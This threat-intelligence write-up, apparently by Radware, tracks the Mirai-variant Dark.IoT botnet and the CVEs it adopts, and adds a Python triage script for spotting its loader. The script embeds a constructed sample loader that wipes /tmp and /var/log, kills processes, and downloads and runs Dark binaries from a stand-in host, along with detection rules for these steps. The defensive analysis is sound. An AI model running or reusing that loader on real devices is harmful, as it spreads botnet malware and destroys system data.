Over the past several months, Radware researchers have been monitoring the evolution of a Mirai variant we have named "Dark.IoT."
On March 15th, Unit 42 researchers at Palo Alto Networks published an alert about a new Mirai variant that was rapidly integrating recently disclosed vulnerabilities. Palo Alto Networks reported that the threat actors behind the botnet leveraged CVE-2021-27561 and CVE-2021-27562 within hours of the vulnerabilities being published. They also noted that the operators were testing several other exploits over the following weeks, including CVE-2021-22502 and CVE-2020-26919. In total, Palo Alto Networks said that the operators attempted to leverage five known and three unknown vulnerabilities.
On August 6th, Juniper Threat Labs published a report about a Mirai variant seen propagating in the wild via CVE-2021-20090, a supply chain vulnerability recently disclosed by Tenable that impacts IoT devices from nearly two dozen vendors, all of which build on Arcadyan firmware. Juniper Threat Labs found that this botnet used the same naming conventions as the one described by Palo Alto Networks and, like it, was rapidly weaponizing new exploits. For example, the operators leveraged CVE-2021-20090 just two days after Tenable published the vulnerability details. Juniper Threat Labs reported that, at the time, the botnet was attempting to test for and exploit six known vulnerabilities tracked by a CVE as well as several other exploits without an assigned CVE.
On August 19th, Radware researchers found that new malware binaries had been published on both loaders used in the campaign. While reviewing the new binaries, we discovered that the operators behind the botnet had incorporated, and are presently preparing to leverage, yet another supply chain vulnerability: CVE-2021-35395. This vulnerability was disclosed by IoT Inspector Research Lab on August 16th and impacts IoT devices from 65 vendors that rely on Realtek chipsets and the Realtek SDK.
The operators behind the Dark.IoT botnet have been developing this variant of the Mirai botnet since February 2021. We named the botnet Dark.IoT based on its use of 'Dark.[architecture]' filenames for its malware binaries and the recurring use of 'lmaoiot' variations throughout its infrastructure naming.
As Palo Alto Networks reported in March 2021, Dark.IoT still attempts to delete the contents of the key system folders /tmp and /var/log on targeted devices when its 'lolol.sh' loader script executes on a new victim. The shell script also uses the killall command to terminate both legitimate and competing bot processes running on the device before downloading the Dark.IoT binaries.
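The loader behaviors described above (wiping /tmp and /var/log, killall against running processes, then fetching and executing 'Dark.[architecture]' binaries) are easy to pick out of a captured shell script with a few tight rules. The following triage script is an added example and is not Radware's code, nor the actual lolol.sh; the sample loader it scans is constructed for the example, and the 'lmaoiot.example' host in it is a placeholder, not a real indicator.

```python
"""Static triage of a Mirai-style IoT loader script.

Added example: flags the behaviours the advisory attributes to the Dark.IoT
loader (wiping /tmp and /var/log, killall, fetching/executing Dark.<arch>
binaries, 'lmaoiot' naming) so an analyst can triage a captured shell
script offline. This is not the real lolol.sh and not Radware's code.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample loader for the example. The host 'lmaoiot.example' is a
# placeholder in the reserved .example TLD, not a real indicator.
SAMPLE_LOADER = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf /tmp/* /var/log/*
killall -9 telnetd httpd dropbear
for arch in x86 mips mipsel arm arm7; do
    wget http://lmaoiot.example/Dark.$arch -O Dark.$arch || curl -O http://lmaoiot.example/Dark.$arch
    chmod +x Dark.$arch
    ./Dark.$arch
done
rm -rf Dark.*
"""


@dataclass(frozen=True)
class Finding:
    tactic: str    # short label for the observed behaviour
    line_no: int   # 1-based line number within the script
    evidence: str  # the matching line, whitespace-stripped


# (label, regex). Kept narrow on purpose: a benign firmware script that
# merely does 'cd /tmp' or downloads an update must not trip these.
RULES = [
    ("wipes-system-dirs", re.compile(r"\brm\s+-rf?\s+.*(/tmp|/var/log)/?\*?")),
    ("kills-processes", re.compile(r"\bkillall\b")),
    ("downloads-dark-binary", re.compile(r"\b(wget|curl|tftp)\b.*\bDark\.[A-Za-z0-9_$]+")),
    ("executes-dark-binary", re.compile(r"(^|[;&|]\s*)\./Dark\.[A-Za-z0-9_$]+")),
    ("lmaoiot-naming", re.compile(r"lmaoiot", re.IGNORECASE)),
]


def scan_loader(script: str) -> list[Finding]:
    """Run every rule over every non-comment line; one Finding per rule hit."""
    findings: list[Finding] = []
    for n, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for label, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(label, n, line))
    return findings


def summarize(findings: list[Finding]) -> list[str]:
    """Distinct behaviours observed, sorted for stable comparison."""
    return sorted({f.tactic for f in findings})


def is_dark_iot_like(findings: list[Finding], threshold: int = 3) -> bool:
    """Heuristic verdict: enough distinct loader behaviours are present.

    A single killall or rm is common in legitimate init scripts; the
    combination of wipe + kill + Dark.<arch> fetch is what matters.
    """
    return len(summarize(findings)) >= threshold


if __name__ == "__main__":
    for f in scan_loader(SAMPLE_LOADER):
        print(f"line {f.line_no:>3}  {f.tactic:<22}  {f.evidence}")
    print("verdict:", "Dark.IoT-like" if is_dark_iot_like(scan_loader(SAMPLE_LOADER)) else "benign")
```

The threshold in `is_dark_iot_like` is deliberately a count of distinct behaviours rather than of matches, so a script that runs `killall` ten times still scores as one behaviour; tune the rule set to your own captured samples before relying on the verdict.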